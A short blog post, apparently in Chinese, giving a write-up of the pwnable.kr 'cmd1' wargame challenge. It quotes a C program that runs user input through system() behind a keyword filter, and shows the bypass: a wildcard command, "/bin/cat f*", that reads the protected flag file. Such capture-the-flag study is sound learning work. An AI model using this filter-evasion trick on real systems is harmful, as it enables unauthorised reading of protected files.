cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

 

源码如下:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

对于传入进行了过滤,不能出现flag、sh、tmp

因此利用通配符,运行./cmd1 "/bin/cat f*"即可

posted @ 2021-09-29 13:14  hktk1643  阅读(68)  评论(0编辑  收藏  举报